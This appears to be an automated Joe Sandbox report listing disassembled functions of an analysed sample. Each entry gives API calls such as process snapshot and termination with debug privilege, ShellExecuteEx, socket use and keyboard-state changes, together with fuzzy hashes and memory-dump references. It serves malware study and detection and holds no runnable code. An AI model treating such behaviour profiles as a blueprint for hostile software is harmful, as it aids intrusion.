Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 66bad08325b9ba7ee207166c561482440e93e1e2fc0f0547914bb592add5b6ae
Instruction ID: 277310df864bf74a7b0e7f35d9c875f29d55d0d7fd0767bed6c464fe0fc8eb64
Opcode Fuzzy Hash: 66bad08325b9ba7ee207166c561482440e93e1e2fc0f0547914bb592add5b6ae
Instruction Fuzzy Hash: 3B41CB713002009FDB14EF64CDA6FAEBBA5AF81754F148429F9069F2D2CBB4A845CB95

Function 00A72F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00A73033

Strings

blank, xrefs: 00A72FB5
info, xrefs: 00A72FD4
warning, xrefs: 00A7301C
stop, xrefs: 00A73004
question, xrefs: 00A72FEC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6b8df6fc493d8342b35f4f9d8f62093ad125857f0e8f9b61e34d6ab3a5281987
Instruction ID: a21c8c3cc84e6b5dc0a6f92b7c478e65906cb9175c2b723b49fd1160670cdc6c
Opcode Fuzzy Hash: 6b8df6fc493d8342b35f4f9d8f62093ad125857f0e8f9b61e34d6ab3a5281987
Instruction Fuzzy Hash: 3E112E3334834ABEDB149B54DC42E6B7BACAF15320F21C06FF908A6181DBB45F4166A0

Function 00A742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A74312
LoadStringW.USER32(00000000), ref: 00A74319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A7432F
LoadStringW.USER32(00000000), ref: 00A74336
_wprintf.LIBCMT ref: 00A7435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A74357

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 2c5b39e7a549ddca077aa9b82565a56077867dbdc2db10b0b46fe3369c8f2e55
Instruction ID: a38c12df3ffd156ee300748469dbf68f7b5c880124a338715e9657ae4d357baa
Opcode Fuzzy Hash: 2c5b39e7a549ddca077aa9b82565a56077867dbdc2db10b0b46fe3369c8f2e55
Instruction Fuzzy Hash: AF0162F7A04208BFE711D7E0DD89EF6776CEB08301F1045A6B749E6051EA745E854B71

Function 00A9D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

GetSystemMetrics.USER32(0000000F), ref: 00A9D47C
GetSystemMetrics.USER32(0000000F), ref: 00A9D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A9D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A9D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A9D716
ShowWindow.USER32(00000003,00000000), ref: 00A9D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00A9D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A9D77D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: ed553b1ade20af0f866efc471d244b4e8f600ffff6d332ce499094697bd71735
Instruction ID: 43754bc89c8f49ebbbdc7d82673d353dc65ad0f35834fd90b9a14646c236d62c
Opcode Fuzzy Hash: ed553b1ade20af0f866efc471d244b4e8f600ffff6d332ce499094697bd71735
Instruction Fuzzy Hash: F4B17975A00225AFDF14CFA8C9C57AD7BF1BF04701F098069ED48AF295DB34A990CBA0

Function 00A12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A12ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00A12B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A4C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A4C286

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ec9ef4d93804e5fefade9c58d3ef611234e5875cfe6bf2aafbf5aca6ab7b1b26
Instruction ID: c13c81ab82e3aacd88999cbb788fb8024474d76ddd286aa74c2a3843fd5ea18e
Opcode Fuzzy Hash: ec9ef4d93804e5fefade9c58d3ef611234e5875cfe6bf2aafbf5aca6ab7b1b26
Instruction Fuzzy Hash: 31413E347097C09FDB759B688CC8BEB7BA6AF85350F14841EE14786560D6B0D8E2D720

Function 00A770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A770DD

Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A77114
EnterCriticalSection.KERNEL32(?), ref: 00A77130
_memmove.LIBCMT ref: 00A7717E
_memmove.LIBCMT ref: 00A7719B
LeaveCriticalSection.KERNEL32(?), ref: 00A771AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A771BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A771DE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 2952e07265902217772ecf1e6836440f0793d93d785f2517122e7115a2ee4992
Instruction ID: 184f9b3cdc8df1ec6c1fdcc5c2ffb9ffbf13fd58371012ab5cde7a9d9da9a47d
Opcode Fuzzy Hash: 2952e07265902217772ecf1e6836440f0793d93d785f2517122e7115a2ee4992
Instruction Fuzzy Hash: AF314D71A00205EFDF00DFA5DD85EAEB7B8EF45710F2581A6F9049A256DB30AA11CBA0

Function 00A961D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A961EB
GetDC.USER32(00000000), ref: 00A961F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A961FE
ReleaseDC.USER32(00000000,00000000), ref: 00A9620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A96246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A96257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00A96291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A962B1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ba17fff683734a0422813f425c444e1cade41b4cf18baa4182bcb3bc85e53ae8
Instruction ID: f1a54f8b2a38d6bf76a3767fccc38d2f1a5c7d20ef0785e79070cbb760aee6bc
Opcode Fuzzy Hash: ba17fff683734a0422813f425c444e1cade41b4cf18baa4182bcb3bc85e53ae8
Instruction Fuzzy Hash: 58316D72201210BFEF118F50CC8AFEA3BA9EF49765F044066FE08DA191DA759852CB60

Function 00A6BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00A6BBC4
_memcmp.LIBCMT ref: 00A6BBE6
_memcmp.LIBCMT ref: 00A6BBFE
_memcmp.LIBCMT ref: 00A6BC11
_memcmp.LIBCMT ref: 00A6BC2B
_memcmp.LIBCMT ref: 00A6BC3E
_memcmp.LIBCMT ref: 00A6BC56
_memcmp.LIBCMT ref: 00A6BC71

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fba00a43bc5b314b04c780fbcf77411a2d69e7f7b2bbda02b6e01ed2d1ddde9b
Instruction ID: 6229743bd2d36869496d52bd82f0702437ed6df63c9d8c798b95e691866cf0a2
Opcode Fuzzy Hash: fba00a43bc5b314b04c780fbcf77411a2d69e7f7b2bbda02b6e01ed2d1ddde9b
Instruction Fuzzy Hash: C821CDB16112057BE2146B25AE42FFB737CEE15398F084420FD04DB683EB65DFA182B1

Function 00A7EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9

_wcstok.LIBCMT ref: 00A7EC94
_wcscpy.LIBCMT ref: 00A7ED23
_memset.LIBCMT ref: 00A7ED56

Strings

X, xrefs: 00A7ED93

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: bf8c333a95eea71c316d933020eaa09c258f2d37f985bec98904e144250d9a05
Instruction ID: 44f81811ffdeaa67c54fb5d2d791b14ff4f430c989c278300bff1907d8f47bb0
Opcode Fuzzy Hash: bf8c333a95eea71c316d933020eaa09c258f2d37f985bec98904e144250d9a05
Instruction Fuzzy Hash: 07C15F756083009FC754EF64C951A9EB7E4FF89310F14896DF8999B2A2DB30ED45CB82

Function 00A86B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A86C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A86C21
WSAGetLastError.WSOCK32(00000000), ref: 00A86C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00A86CEA
inet_ntoa.WSOCK32(?), ref: 00A86CA7

Part of subcall function 00A6A7E9: _strlen.LIBCMT ref: 00A6A7F3
Part of subcall function 00A6A7E9: _memmove.LIBCMT ref: 00A6A815

_strlen.LIBCMT ref: 00A86D44
_memmove.LIBCMT ref: 00A86DAD

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 5c6860006b8e470eb385a43568335d7e3b2d96702e402d416ccb4d480ba757c0
Instruction ID: 00c1069127b36072ba65b5fae06f7c7c926a213b287bff20fd0a94bd02ae8f62
Opcode Fuzzy Hash: 5c6860006b8e470eb385a43568335d7e3b2d96702e402d416ccb4d480ba757c0
Instruction Fuzzy Hash: 6381DD72608300AFE710FF64CD96EABB7E8AF84714F144918F9559B292DA70ED41CB92

Function 00A11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43189ee112641a9057db13a6362b8abf8c5769fb8eac49ba1326db82d52085d
Instruction ID: dd3088248eb7ac2375e4cdf0bd640621eb1054ea8bb3fb7c40a08a96fedf544c
Opcode Fuzzy Hash: d43189ee112641a9057db13a6362b8abf8c5769fb8eac49ba1326db82d52085d
Instruction Fuzzy Hash: 5C716D74900109EFCB04CF98CC89AFEBB79FF85710F248159FA15AA251D734AA91CFA4

Function 00A9B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01114B18), ref: 00A9B3EB
IsWindowEnabled.USER32(01114B18), ref: 00A9B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A9B4DB
SendMessageW.USER32(01114B18,000000B0,?,?), ref: 00A9B512
IsDlgButtonChecked.USER32(?,?), ref: 00A9B54F
GetWindowLongW.USER32(01114B18,000000EC), ref: 00A9B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A9B589

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e8786b7aa22fb8d261a2910c9cff7d6393cacd4e6c7514485d01bfc9e5029479
Instruction ID: 232da549436854a6038d15036d29d33a7f1239baeae28e40ec605044a874b060
Opcode Fuzzy Hash: e8786b7aa22fb8d261a2910c9cff7d6393cacd4e6c7514485d01bfc9e5029479
Instruction Fuzzy Hash: 1471A034710204EFDF20DF64EA94FBA7BF5EF49300F14415AEA4697262C731A851EB60

Function 00A8F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A8F448
_memset.LIBCMT ref: 00A8F511
ShellExecuteExW.SHELL32(?), ref: 00A8F556

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9

GetProcessId.KERNEL32(00000000), ref: 00A8F5CD
CloseHandle.KERNEL32(00000000), ref: 00A8F5FC

Strings

@, xrefs: 00A8F525

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 90689ee87a9f39836e4a188d246d9b4fed094f569ae32c182f9585aee07b9fc4
Instruction ID: 165a747eb09a7e9fa66b6519c4146dab9126abbf092f3799d4244ee13cfef2b2
Opcode Fuzzy Hash: 90689ee87a9f39836e4a188d246d9b4fed094f569ae32c182f9585aee07b9fc4
Instruction Fuzzy Hash: B2618D75A006199FCB14EFA4C9919AEBBF5FF49310F148069E855AB351CB30AE81CF94

Function 00A70F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A70F8C
GetKeyboardState.USER32(?), ref: 00A70FA1
SetKeyboardState.USER32(?), ref: 00A71002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00A71030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00A7104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00A71095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A710B8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 827ec72c743e9ec96712780d06f653dbe3b20ec34cb18140ba4ca47087634bbd
Instruction ID: f67ac775beb70af65629d64d81c3870c0f0f03b6fe408ac8f0ee9c3d88929f4d
Opcode Fuzzy Hash: 827ec72c743e9ec96712780d06f653dbe3b20ec34cb18140ba4ca47087634bbd
Instruction Fuzzy Hash: F151E1A06047D57DFB3647388C05BBABEE95B06304F08C589E1DC8A8C3C2A9ACDAD751

Function 00A70D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A70DA5
GetKeyboardState.USER32(?), ref: 00A70DBA
SetKeyboardState.USER32(?), ref: 00A70E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A70E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A70E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A70EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A70EC9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: db1949eda6fa0390ad7c29567fd66ed63922b4d230c0181fe6c323c4761519f2
Instruction ID: 74a14d4454bb8949bdec17bee40505e5601271dcdacdec195bcf692484885be5
Opcode Fuzzy Hash: db1949eda6fa0390ad7c29567fd66ed63922b4d230c0181fe6c323c4761519f2
Instruction Fuzzy Hash: FA51F4A16047D5BDFB3687748C45FBABEA99B06300F08C889F1DC868C3D395AC99D750

